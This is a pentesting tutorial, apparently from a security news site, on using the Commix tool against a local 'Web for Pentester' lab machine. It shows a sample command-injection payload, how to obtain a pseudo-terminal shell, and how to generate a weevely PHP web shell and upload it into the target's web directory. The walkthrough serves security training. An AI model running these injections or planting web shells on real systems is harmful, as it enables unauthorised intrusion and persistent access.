Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, by web developers, penetration testers, or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.
By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. It is written in Python programming language.
Requires version 2.6.x and above to run this tool, it can be downloaded from the GitHub.
root@kali:~# git clone https://github.com/commixproject/commix.gitAlso, can be installed through Ubuntu’s APT (Advanced Packaging Tool)
root@kali:~# apt-get install commixStep1: Download and mount the Pentester lab exercise Web for Pentester and then you can reach the labs from your Kali machine browser Ex: http://192.168.169.130
Step 2: You can find command line Injection exercises.
Step 3: Now in Kali type commix and copy the path for example 1.
INJECT_HERE – It will try to inject various queries here.
root@kali:~# commix –url=”http://192.168.169.130/commandexec/example1.php?ip=INJECT_HERE”It checks for various payloads and successful with Payload: ;echo WIBYAT$((24+78))$(echo WIBYAT)WIBYAT.
Then it asks to connect with a terminal shell Do you want a Pseudo-Terminal shell? [Y/n/q] > By pressing “y” we can get the terminal access for the machine.
Step 1: Create a payload with weevely, if weevely is not installed you can use apt-get install weevely.
Step 2: Launch weevely and generate a PHP web shell.
root@kali:~# weevely root@kali:~# weevely generate commix /root/Desktop/Commix/shellexploit.phpStep 3: To upload the file in the remote host, use the following command.
–file-write = File to write in the destination host
–file-dest = Filepath to write or Upload
commix –url=”http://192.168.169.130/commandexec/example1.php?ip=INJECT_HERE” –file-write=’/root/Desktop/Commix/shellexploit.php’ –file-dest=”/var/www/upload/images/”The cybercriminal group behind the notorious "darcula-suite" platform has unveiled its latest iteration, darcula 3.0,…
A highly advanced threat actor, dubbed "Salt Typhoon," has been implicated in a series of…
The notorious CL0P ransomware group has intensified its operations in early 2025, targeting critical sectors…
Cybercriminals are increasingly leveraging sophisticated Adversary-in-the-Middle (AiTM) phishing techniques, enabled by the rise of Phishing-as-a-Service…
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released seven Industrial Control Systems (ICS) advisories…
The once-shadowy realm of Pegasus spyware has breached new frontiers, with forensic analyses revealing a…
View Comments